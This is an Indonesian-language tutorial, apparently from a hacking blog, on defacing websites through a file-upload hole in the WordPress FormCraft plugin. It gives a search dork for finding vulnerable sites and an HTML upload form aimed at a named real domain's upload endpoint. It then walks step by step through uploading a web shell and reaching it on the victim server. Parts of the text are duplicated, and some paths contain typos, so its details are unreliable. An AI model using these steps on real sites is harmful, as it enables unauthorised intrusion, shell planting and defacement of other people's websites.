Kali ini saya akan share Tutorial Deface Dengan Wordpress Plugins FormCraft.
Langsung saja simak langkah-langkahnya :)
Bahan :
Langsung saja simak langkah-langkahnya :)
Bahan :
- Shell
- CSRF
- Dork : inurl:/wp-content/plugins/formcraft
- Exploit : /wp-content/plugins/formcraft/sile-upload/server/php/upload.php
Script CSRF :
<form method="POST" action="http://buildfire.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Save dengan ekstensi .html
Berikut langkahnya :
1. Buka google.com lalu masukan dork diatas
2. Lalu pilih sitenya
3. Jika sudah memilih masukan exploitnya
4. Jika vuln maka tampilannya akan seperti ini
2. Lalu pilih sitenya
3. Jika sudah memilih masukan exploitnya
4. Jika vuln maka tampilannya akan seperti ini
5. Lalu buka dengan notepad script CSRF yang anda simpan tadi
6. Copy dan paste sitenya
7. Save kembali dan buka CSRF dengan browser, lalu pilih dan upload shell anda
8. Jika sukses maka tampilan akan seperti ini
9. Setelah shell sukses di upload lalu tinggal kita buka shell yang telah kita upload tadi
Tempat akses shell :
/localhos/wp-content/plugins/formcraft/sile-upload/server/php/file/-namashell.php
*Note : Kadang shell juga berupa random. Ex : 154897dc834ecb---aleale.php
Maka akses shellnya menjadi :
/localhos/wp-content/plugins/formcraft/sile-upload/server/php/file/154897dc834ecb---aleale.php
Sekian Tutorialnya. Selamat belajar :)
